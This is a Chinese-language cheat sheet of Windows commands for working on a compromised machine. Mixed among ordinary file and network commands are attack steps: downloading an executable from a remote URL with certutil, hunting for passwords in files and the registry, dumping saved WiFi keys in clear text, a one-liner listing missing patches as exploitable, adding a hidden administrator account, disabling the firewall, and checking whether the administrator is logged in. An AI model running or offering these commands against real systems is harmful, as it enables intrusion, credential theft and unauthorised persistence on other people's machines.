如果我有七个小时的时间来砍树,那么我一定会花6个小时来磨我的斧头!
certutil-----从远程url下载文件
案例:certutil -urlcache -split -f http://baidu.com/test.exe
findstr-----查找文件后缀结果
findstr /s /i "pass" *.py*
reg query HKLM /f password /t REG_SZ /s-----搜集注册表中的各种密码数据
查看有没有开启远程链接,运行下面命令:
REG QUERY "HKEY_LOCAL_macHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections
结果:1表示关闭,0表示开启
快速查找未打补丁的exp
systeminfo>bzhack.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type bzhack.txt|@find /i "%i"|| @echo %i you can exp)&del /f /q /a bzhack.txt
ipconfig/all-----网络配置情况
ipconfig /displayDNS-----查看本地DNS缓存
netsh wlan show profile-----查看连接过的 wifi 名
netsh wlan show profile WiFi-name key=clear 获取 wifi 对应的的密码
query user-----查当前机器中正在线的用户,看管理员在不在
net view------显示域列表/计算机列表
net user------查看当前所有账号,判断域规模
net group-----查看当前域所有的组名
net user bzhack pass /add-----增加用户
net user bzhack /del-----删除用户
net Localgroup-----添加、显示本地组
net localgroup administrators bzhack /add-----将bzhack加入管理员组
net share----- 查看当前机器开启的共享
md-----建文件夹
rd-----删除文件夹
tree-----显示文件夹结构
dir-----显示磁盘目录内容
copy-----复制文件
Xcopy-----copy加强版,复制文件夹
del-----删除文件
ren-----[原文件/夹名][新文件/夹名]修改文件名
type-----查看文本内容
dir /a /s /b d:"*.conf"-----搜索d盘里conf结尾的文件
edit-----文本编辑
type-----显示文件内容
netstat -a----- 列出所有端口
netstat -p----- 显示 PID 和进程名称
netstat -r----- 显示核心路由信息
netstat -at-----列出所有tcp连接
netstat -au-----列出所有ucp连接
netstat -an |find "3389" 查看开启3389端口的信息
netstat -ano | findstr "ESTABLISHED" 查看当前正处于连接状态的端口及ip
netstat -ano | findstr "LISTENING" 查看当前正处于监听状态的端口及ip
ver-----查看版本
hostname-----查看机器名
whoami-----查看权限
systeminfo-----查看配置
tasklist-----查看进程
cls-----清屏
net start-----查看开启的服务,比如Terminal Services 远程连接服务
net stop sharedaccess-----关闭防火墙
set-----查看当前机器的环境变量,看有没有我们可以直接利用到的语言环境
fsutil fsinfo drives-----列出当前机器上的所有盘符